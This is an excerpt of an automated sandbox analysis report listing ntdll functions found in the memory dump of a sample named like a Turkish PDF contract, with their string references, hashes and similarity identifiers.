                              • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                              • API String ID: 0-1988757188
                              • Opcode ID: 290ee8dda8fc68621865ccb2f0edca8ff77b520686e1ab64ef32bc12ee1cc166
                              • Instruction ID: 22ef60116b19472c34b8c7079b126dca8326ea669b2ff9a7ef5d89ee7867789d
                              • Opcode Fuzzy Hash: 290ee8dda8fc68621865ccb2f0edca8ff77b520686e1ab64ef32bc12ee1cc166
                              • Instruction Fuzzy Hash: 53E1F374608391DFE715CE24C8A0B6AB7F1FB85358F144A6DF855CB290DB32E849CBA1
                              Function 32BAD690 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372timeCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              • GsHd, xrefs: 32BAD794
                              • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 32BF9153
                              • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 32BF9178
                              • RtlpFindActivationContextSection_CheckParameters, xrefs: 32BF914E, 32BF9173
                              • Actx , xrefs: 32BF9315
                              • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 32BF9372
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: DebugPrintTimes
                              • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                              • API String ID: 3446177414-2196497285
                              • Opcode ID: 3ef01523d808f754d0d4961868295fc20b936565b5d99c17b26a4862dcfb9dc8
                              • Instruction ID: 10552da3d5a4d642107e703c01a1c73e7a5fa66632addd10af38ae74624d3908
                              • Opcode Fuzzy Hash: 3ef01523d808f754d0d4961868295fc20b936565b5d99c17b26a4862dcfb9dc8
                              • Instruction Fuzzy Hash: D7E1C674608752EFE704CF14C890B5AB7E4FF88798F404A2DE995C7291DB71E948CB92
                              Function 32C0FA02 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 109timeCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: DebugPrintTimes
                              • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                              • API String ID: 3446177414-4227709934
                              • Opcode ID: 3f85f4e6b7fdcb7c7abf312b0a0b30025243db5926b4a1e78c0cfbbcb9e31a76
                              • Instruction ID: 4a16e58699d4fdb232b8408eb3d8864c3b9c44ebe1d1b13abfc8e4e13d8b8335
                              • Opcode Fuzzy Hash: 3f85f4e6b7fdcb7c7abf312b0a0b30025243db5926b4a1e78c0cfbbcb9e31a76
                              • Instruction Fuzzy Hash: ED415EB5A41209ABDB01CF99C980AEEBBB5FF88754F118159ED04B7350DB71DA81CFA0
                              Function 32B99046 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 199timeCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: DebugPrintTimes
                              • String ID: $$@$@wu
                              • API String ID: 3446177414-503205031
                              • Opcode ID: 06f83920e93662aea41c9a23b6d84f2c5d36f8ff63bfdd5297a8d9db401ea46a
                              • Instruction ID: c0d785bd7e83cffccc32a68019f1855085f5d9576b6bc77efcf0d3058af05507
                              • Opcode Fuzzy Hash: 06f83920e93662aea41c9a23b6d84f2c5d36f8ff63bfdd5297a8d9db401ea46a
                              • Instruction Fuzzy Hash: 13812BB1D01269ABDB25CF54CC44BEEB7B8AF04754F1041EAEA19B7240DB709E85CF60
                              Function 32C3F8F8 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 190timeCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: DebugPrintTimes
                              • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                              • API String ID: 3446177414-3492000579
                              • Opcode ID: adef6fcc99879c35cf2c22e0a5bd207b3404a07d8446f3f295b4b7d2a1c571c9
                              • Instruction ID: d82c1b24f0e842696607af1f93cc8d9f7158cf260f036670d435c3eb69efd3ed
                              • Opcode Fuzzy Hash: adef6fcc99879c35cf2c22e0a5bd207b3404a07d8446f3f295b4b7d2a1c571c9
                              • Instruction Fuzzy Hash: 7B71F1749066849FDB06CF68C490AEDFBF1FF89308F048959E585EB251CB799981CB50
                              Function 32B86565 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              • LdrpLoadShimEngine, xrefs: 32BE984A, 32BE988B
                              • minkernel\ntdll\ldrinit.c, xrefs: 32BE9854, 32BE9895
                              • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 32BE9885
                              • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 32BE9843
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: DebugPrintTimes
                              • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                              • API String ID: 3446177414-3589223738
                              • Opcode ID: 7c79a5a0e72a3c2af8dddfd5ccdfa3905cc93d2ad81e7f8f4f7411754b0ed6b1
                              • Instruction ID: fccbc86caef12da7a20eac36334f19b10b68a2d5b0988b24fc90b9ea897b09a2
                              • Opcode Fuzzy Hash: 7c79a5a0e72a3c2af8dddfd5ccdfa3905cc93d2ad81e7f8f4f7411754b0ed6b1
                              • Instruction Fuzzy Hash: 7C512335A003E89BDB04DBA8CC54FDD77B6EF40344F054625E995BB296DBB0AC86C780
                              Function 32BBDA20 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133timeCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: DebugPrintTimes
                              • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                              • API String ID: 3446177414-3224558752
                              • Opcode ID: b9d8f6a96217222421067707c13d37eb18bd546c347fe7f3159fc37dc155677e
                              • Instruction ID: f92948b789cc52e49644b17e08c52478786ed649ab6592ba427e68607688ffb3
                              • Opcode Fuzzy Hash: b9d8f6a96217222421067707c13d37eb18bd546c347fe7f3159fc37dc155677e
                              • Instruction Fuzzy Hash: CE415735604751EFEB11CF28C884B6AB7A4FF41368F0489A8E925977C1CB7DA984CB91
                              Function 32C3ECD7 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128timeCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              • HEAP: , xrefs: 32C3ECDD
                              • ---------------------------------------, xrefs: 32C3EDF9
                              • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 32C3EDE3
                              • Entry Heap Size , xrefs: 32C3EDED
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: DebugPrintTimes
                              • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                              • API String ID: 3446177414-1102453626
                              • Opcode ID: e0471768e8ee75d7a53efde1df8bd490e09c682038e8c2472ba279826db375b3
                              • Instruction ID: 19383b6fe8251e4c5ca8c794f0df6949f4b08afbee1b7ff10ac0286c952dc529
                              • Opcode Fuzzy Hash: e0471768e8ee75d7a53efde1df8bd490e09c682038e8c2472ba279826db375b3
                              • Instruction Fuzzy Hash: 09416D39A02295DFC716CF19C884A5ABBF5FF85354725C9A9D508EB210DB35EC42CBC0
                              Function 32BBDAC0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84timeCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: DebugPrintTimes
                              • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                              • API String ID: 3446177414-1222099010
                              • Opcode ID: 2d11df91ddfa0da003f1c4d362f6d0e532ab4356674d992612776a87bb3a4602
                              • Instruction ID: 26a10a128244d2af6f1ec13aa6188883337b6fa249324b13644dde79ec8f0f4e
                              • Opcode Fuzzy Hash: 2d11df91ddfa0da003f1c4d362f6d0e532ab4356674d992612776a87bb3a4602
                              • Instruction Fuzzy Hash: F2312775105BD4EFEB36CB24C804F6977A4FF01798F0044D5E845876A2CBBAD985CA51
                              Function 32BC4C3D Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117timeCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              • LdrpFindDllActivationContext, xrefs: 32C03440, 32C0346C
                              • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 32C03439
                              • minkernel\ntdll\ldrsnap.c, xrefs: 32C0344A, 32C03476
                              • Querying the active activation context failed with status 0x%08lx, xrefs: 32C03466
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: DebugPrintTimes
                              • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                              • API String ID: 3446177414-3779518884
                              • Opcode ID: 51cbf9fdeeba568c14558b8c07aef449803689f32c6a021a6a953ff27288358a
                              • Instruction ID: d66f9def8435bbeaae3d1b71cd55ab14d5ec611a98ef086406b2bbbc7d20c27c
                              • Opcode Fuzzy Hash: 51cbf9fdeeba568c14558b8c07aef449803689f32c6a021a6a953ff27288358a
                              • Instruction Fuzzy Hash: ED31B3B6A44371ABFB119B44C884B5BB2BCFB41398F42C166ED0667171DBA0DEC0C6B1
                              Function 32B8F8B0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263timeCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: DebugPrintTimes
                              • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                              • API String ID: 3446177414-3610490719
                              • Opcode ID: c0bedbd3260f4fd49c1c5cb2535a8e02481c6a794765d229489ed847642fd95e
                              • Instruction ID: b0a36ef071edf93493b05d1f5c7fb03dcd7b907b826211602e624483112e5dab
                              • Opcode Fuzzy Hash: c0bedbd3260f4fd49c1c5cb2535a8e02481c6a794765d229489ed847642fd95e
                              • Instruction Fuzzy Hash: 3A9103752047A0EFE31ACF24C894F2AB7A5FF84B54F400559EA599B281EF74E841CBD2
                              Function 32BB0AEB Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210timeCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              • LdrpCheckModule, xrefs: 32BF9F24
                              • minkernel\ntdll\ldrinit.c, xrefs: 32BF9F2E
                              • Failed to allocated memory for shimmed module list, xrefs: 32BF9F1C
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: DebugPrintTimes
                              • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                              • API String ID: 3446177414-161242083
                              • Opcode ID: b3d5a1a1009dc041f2060ede00c5edc40863e33e215b4af92a90ab408860ba06
                              • Instruction ID: 4175d80ff6c97f36b5fd0e3b8302ce438a0c2f3454c360c103b9494cd60a3829
                              • Opcode Fuzzy Hash: b3d5a1a1009dc041f2060ede00c5edc40863e33e215b4af92a90ab408860ba06
                              • Instruction Fuzzy Hash: F471E174A042459FEF18DF68CD90BBEB7F4EF44308F148969E805E7251EB71A986CB50
                              Function 32BBEE48 Relevance: 6.3, APIs: 4, Instructions: 347COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0561cd4e551f535324bddc12561a9a76cf1edddd6727e7d3cb666de3ed48eb91
                              • Instruction ID: d478c0c26e04ea5f18be79c66114e391769b7d0220349c31aed7275661a46c8c
                              • Opcode Fuzzy Hash: 0561cd4e551f535324bddc12561a9a76cf1edddd6727e7d3cb666de3ed48eb91
                              • Instruction Fuzzy Hash: 6DE1DD79900718DFDF25CFA9C980AADBBF5FF48304F10492AE946A7660DB71A981CF50
                              Function 32C6A04A Relevance: 6.2, APIs: 4, Instructions: 170timeCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: DebugPrintTimes
                              • String ID:
                              • API String ID: 3446177414-0
                              • Opcode ID: a612c1f422bbdf78c162c0103db0119526b51cbd9f60b91678b15bddd14a32e3
                              • Instruction ID: 7ec2bc84cf8e0de3b78c8de312705a6d39eed2a2aae37c0d5c0c90ec18ed18ad
                              • Opcode Fuzzy Hash: a612c1f422bbdf78c162c0103db0119526b51cbd9f60b91678b15bddd14a32e3
                              • Instruction Fuzzy Hash: F0512679715612DFEB08CE19C8E0A29B7E2BF8D358B18416DE906DB761DB71EC41CB80
                              Function 32BC7A4F Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: DebugPrintTimes$BaseInitThreadThunk
                              • String ID:
                              • API String ID: 4281723722-0
                              • Opcode ID: 7950a1a4f1dad144a7b908b76a54cf7bbe3789d4c9030da0fd96061ffc4a9622
                              • Instruction ID: c6fd9cf65d799aa36f91821227ba60df20656211737134812dea202cb1b899c5
                              • Opcode Fuzzy Hash: 7950a1a4f1dad144a7b908b76a54cf7bbe3789d4c9030da0fd96061ffc4a9622
                              • Instruction Fuzzy Hash: F9313275E412989FCB15DFA8D884A9EBBF0AF48320F10862AE911F7280DB319941CF54
                              Function 32B958E0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID: @
                              • API String ID: 0-2766056989
                              • Opcode ID: 3c4b0eb6cf9ec4e86be2bbc0a7c86540d11553349e6805eee4c7265e37f72766
                              • Instruction ID: 28b82dbfaf36c26e60cbf2730fe278d8c681423e7ea0141169779cb84e29c9bf
                              • Opcode Fuzzy Hash: 3c4b0eb6cf9ec4e86be2bbc0a7c86540d11553349e6805eee4c7265e37f72766
                              • Instruction Fuzzy Hash: 5D324574D442699FEB25CF64C884BD9BBB4FF08304F0081E9D949A7251EBB59A88CF90
                              Function 32BC4B79 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID: 0$Flst
                              • API String ID: 0-758220159
                              • Opcode ID: cad90272c1a7d6b78d185c1cc760ed1e0093269db2cd2356aaaf920242a64638
                              • Instruction ID: d462745b63dbd64436b09a3ac02f3eb208627ffcbfc809764264eb6fc5a504bf
                              • Opcode Fuzzy Hash: cad90272c1a7d6b78d185c1cc760ed1e0093269db2cd2356aaaf920242a64638
                              • Instruction Fuzzy Hash: 4A519DB5E012688BEB24CF98C88475AFBF8EF84755F14C529D44A9B250DB709A86CB90
                              Function 32B8DF21 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: DebugPrintTimes
                              • String ID: 0$0
                              • API String ID: 3446177414-203156872
                              • Opcode ID: a31b99907ad7301f83e9e1933ff598cc308e7499271080b7e9dda76269ea73a1
                              • Instruction ID: d26822fb0c13508d5bd0f7ea564120426b574cc4050358280094a21bb5177fda
                              • Opcode Fuzzy Hash: a31b99907ad7301f83e9e1933ff598cc308e7499271080b7e9dda76269ea73a1
                              • Instruction Fuzzy Hash: 4E414DB66087529FD300CF28C444A5ABBE5FB89354F044A6EF98CDB341D771EA05CB96